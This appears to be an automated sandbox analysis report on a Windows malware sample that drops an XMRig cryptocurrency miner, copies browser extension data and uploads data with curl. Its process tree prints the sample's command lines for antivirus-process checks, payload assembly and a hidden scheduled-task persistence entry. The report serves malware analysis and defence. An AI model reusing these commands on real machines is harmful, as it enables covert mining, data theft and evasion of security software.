                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):2049
                                                                                            Entropy (8bit):4.53400832638798
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:vIuTHxiHLTsbNbGAS5J5hAv1SQ8d0Swr5m0SrC6O1cvWGAj7DFCz:wuTRgJIS4SeSr2Mp
                                                                                            MD5:DCB095940D9FB21102941FBEB7BBE9F7
                                                                                            SHA1:3C0D33B914BC5B174CD9C13427EC8700C09D96CA
                                                                                            SHA-256:BA88BBB257474D6D7E8E9BEC7A12FF826C3FA80CB019FBC92EA8D6253C2400B1
                                                                                            SHA-512:C384A68FAC9C301EFD695605E6B14E1E201BE687D99CC1E31C6ED2C3D17F37C28802179DD175B4AADB29A3DD6D808B203E18EE96DB63A5DBCB92C9D42D2036C2
                                                                                            Malicious:false
                                                                                            Preview:{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": 3,. "memory-pool": false,. "yield": true,. "max-threads-hint": 60,. "asm": true,. "argon2-impl": null,. "cn/0": false,. "cn-lite/0": false. },. "opencl": {. "enabled": false,. "cache": true,. "loader": null,. "platform": "AMD",. "adl": true,. "cn/0": false,. "cn-lite/0": false. },. "cuda": {. "enabled": true,. "loader": null,. "nvml": true,.
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6412800
                                                                                            Entropy (8bit):6.624511627494028
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:JtRK2Xvf49fuI0nBkLuFvJr4XGCkc/zF2fz5IZ4ePzpS+KdbjrD/6K+TU3nA:I2Xv42VKzYz6Z4qSndf3D+TU3A
                                                                                            MD5:F6D520AE125F03056C4646C508218D16
                                                                                            SHA1:F65E63D14DD57EADB262DEAA2B1A8A965A2A962C
                                                                                            SHA-256:D2FCF28897DDC2137141D838B734664FF7592E03FCD467A433A51CB4976B4FB1
                                                                                            SHA-512:D1EC3DA141CE504993A0CBF8EA4B719FFA40A2BE4941C18FFC64EC3F71435F7BDDADDA6032EC0AE6CADA66226EE39A2012079ED318DF389C7C6584AD3E1C334D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: Joe Security
                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: unknown
                                                                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: Florian Roth
                                                                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\asm\mi.exe, Author: ditekSHen
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........{S.N.=.N.=.N.=..b>.B.=..b8..=..o9.].=..o>.D.=..o8...=..b9.W.=.o9.\.=.N.<...=..b<.Y.=...9.n.=.o4.G.=.o>.M.=.o..O.=.N...O.=.o?.O.=.RichN.=.........................PE..d...))'g.........."......VB..rI.......>........@.............................0............`.................................................T.\..........Y...................p........Y.......................Y.(.....Y.8............pB.p............................text...8TB......VB................. ..`.rdata..nw...pB..x...ZB.............@..@.data.....*...\.......\.............@....pdata................].............@..@_RANDOMXV.............`.............@..`_TEXT_CN.&.......(....`.............@..`_TEXT_CN..............`.............@..`_RDATA................`.............@..@.rsrc....Y.......Z....`.............@..@.reloc.......p.......$a.............@..B........................................
                                                                                            Process:C:\Windows\SysWOW64\curl.exe
                                                                                            File Type:ASCII text, with CR, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):478
                                                                                            Entropy (8bit):3.065498569262554
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivId22PVW4/UYAn:Vz6ykymUexb1U9cL9cddbPVW4On
                                                                                            MD5:895D12077AC121B410C13FD8EBFA84EF
                                                                                            SHA1:930CA09110FAA76691F01F52E5E03BA66DAD8436
                                                                                            SHA-256:79B0737E1CCAF5AE48117B23C1FB3A492DD31B21CFA48C0AF4E2437379165723
                                                                                            SHA-512:4C1AAF22A1315B69C80EC0B42305A75E86F7E81F9B5F020BF197D7A7271042D830A3E7AF26A842EFF5F71B4960DF80BDD96CD464ADD0864A83177E721A07430A
                                                                                            Malicious:false
                                                                                            Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 2556 100 86 100 2470 43 1252 0:00:02 0:00:01 0:00:01 1296..
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):682
                                                                                            Entropy (8bit):4.907497847855632
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:oPaYeb8rcHEZrENtaYeb8rcHEZrEqkaYeb8rcHEZrE5XaYeb8rcHEZrEqaYeb8r7:oPaYeb8nZrEPaYeb8nZrEqkaYeb8nZro
                                                                                            MD5:F4C4729AE652B1F97AF36572C6EBC890
                                                                                            SHA1:F4404BEFC614618CE98E95CD3FBA8E720F51B9B5
                                                                                            SHA-256:0E78570EEC12F8E2E6C33FE93224D5ABD9B8AC5DB6AF5293FBCFEC27C1FC24E1
                                                                                            SHA-512:97D0D5B3159D16650A720953315E9711A62168BCE970E799E45EBDB534A7A045524AEDA52987C301FE821E305AAC0676B46B8696AF772D123D164C720522F824
                                                                                            Malicious:false
                                                                                            Preview:C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000003.log..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOCK..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG..C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001..5 File(s) copied..
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.999048531814604
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:DM6vAAgoCw.exe
                                                                                            File size:7'284'070 bytes
                                                                                            MD5:a67e34baacfca98f323981d3b0087f3b
                                                                                            SHA1:d22ccae2971df83812acaebc750d9a2c87357fe5
                                                                                            SHA256:6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
                                                                                            SHA512:39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d
                                                                                            SSDEEP:196608:cALE6dWjWnulUCK9vDfaa1RkYP60bs25rXSNBl66Wncma:a6fuiPrfZ1RBP60bs25rXQ66WnG
                                                                                            TLSH:1F7633745E1BFAB3E45A2E78AA315F75F9EB9F124C408E4B1059E66C9130B161CB30B3
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                            Icon Hash:ccb8a06d6d3b9ecc
                                                                                            Entrypoint:0x4038af
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:0
                                                                                            File Version Major:5
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                            Error Number:-2146869232
                                                                                            Not Before, Not After
                                                                                            • 11/10/2023 20:00:00 11/10/2026 19:59:59
                                                                                            Subject Chain
                                                                                             • CN=Anvsoft Inc., O=Anvsoft Inc., S=广东省, C=CN, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91440300678599838F
                                                                                            Version:3
                                                                                            Thumbprint MD5:EC7B36F045D3BB302D05569D0BD6531F
                                                                                            Thumbprint SHA-1:9F99B788DFFFB11844E772AFFEC29DD91B12B8BC
                                                                                            Thumbprint SHA-256:76526A2214EE71A25AA57B9EAF03D64B0F146BE5562E2568FA089653FE4A07B9
                                                                                            Serial:6E6AEF9D6F88948F39C9D04ACD49007B
                                                                                            Instruction
                                                                                            sub esp, 000002D4h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            xor ebp, ebp
                                                                                            pop esi
                                                                                            mov dword ptr [esp+18h], ebp
                                                                                            mov dword ptr [esp+10h], 0040A268h
                                                                                            mov dword ptr [esp+14h], ebp
                                                                                            call dword ptr [00409030h]
                                                                                            push 00008001h
                                                                                            call dword ptr [004090B4h]
                                                                                            push ebp
                                                                                            call dword ptr [004092C0h]
                                                                                            push 00000008h
                                                                                            mov dword ptr [0047EB98h], eax
                                                                                            call 00007FB1887C640Bh
                                                                                            push ebp
                                                                                            push 000002B4h
                                                                                            mov dword ptr [0047EAB0h], eax
                                                                                            lea eax, dword ptr [esp+38h]
                                                                                            push eax
                                                                                            push ebp
                                                                                            push 0040A264h
                                                                                            call dword ptr [00409184h]
                                                                                            push 0040A24Ch
                                                                                            push 00476AA0h
                                                                                            call 00007FB1887C60EDh
                                                                                            call dword ptr [004090B0h]
                                                                                            push eax
                                                                                            mov edi, 004CF0A0h
                                                                                            push edi
                                                                                            call 00007FB1887C60DBh
                                                                                            push ebp
                                                                                            call dword ptr [00409134h]
                                                                                            cmp word ptr [004CF0A0h], 0022h
                                                                                            mov dword ptr [0047EAB8h], eax
                                                                                            mov eax, edi
                                                                                            jne 00007FB1887C39DAh
                                                                                            push 00000022h
                                                                                            pop esi
                                                                                            mov eax, 004CF0A2h
                                                                                            push esi
                                                                                            push eax
                                                                                            call 00007FB1887C5DB1h
                                                                                            push eax
                                                                                            call dword ptr [00409260h]
                                                                                            mov esi, eax
                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                            jmp 00007FB1887C3A63h
                                                                                            push 00000020h
                                                                                            pop ebx
                                                                                            cmp ax, bx
                                                                                            jne 00007FB1887C39DAh
                                                                                            add esi, 02h
                                                                                            cmp word ptr [esi], bx
                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                            • [LNK] VS2010 SP1 build 40219
                                                                                             Name | Virtual Address | Virtual Size | Is in Section
                                                                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x20eb6 | .rsrc
                                                                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6ec516 | 0x6050 |
                                                                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
                                                                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                             .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                             .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                             .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                             .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                             .rsrc | 0x100000 | 0x20eb6 | 0x21000 | 225f0ef94c66f4318e4f7cae39f9f390 | False | 0.9587328361742424 | data | 7.8565084109257155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                             .reloc | 0x121000 | 0xfd6 | 0x1000 | bcc1b865322f974509fa95be60f483c2 | False | 0.596923828125 | data | 5.562954404310927 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100220 | 0x1416d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9940329343136659
RT_ICON | 0x114390 | 0x78e3 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9992891071832488
RT_ICON | 0x11bc74 | 0x2648 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0011224489795918
RT_ICON | 0x11e2bc | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5896053702196908
RT_DIALOG | 0x120924 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x120a24 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x120b40 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x120ba0 | 0x3e | Targa image data - Map 32 x 16749 x 1 +1 | English | United States | 0.8387096774193549
RT_MANIFEST | 0x120be0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193

DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Language of compilation system | Country where language is spoken | Map
English | United States |

                                                                                            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                            Target ID:0
                                                                                            Start time:03:32:41
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\DM6vAAgoCw.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:7'284'070 bytes
                                                                                            MD5 hash:A67E34BAACFCA98F323981D3B0087F3B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:03:32:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:03:32:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xeb0000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr /I "wrsa opssvc"
                                                                                            Imagebase:0x820000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xeb0000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                            Imagebase:0x820000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c md 491505
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:Dr.com B
                                                                                            Imagebase:0xd00000
                                                                                            File size:893'608 bytes
                                                                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:11
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:choice /d y /t 15
                                                                                            Imagebase:0x4a0000
                                                                                            File size:28'160 bytes
                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:03:32:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:03:32:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:03:32:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                                                                            Imagebase:0xa40000
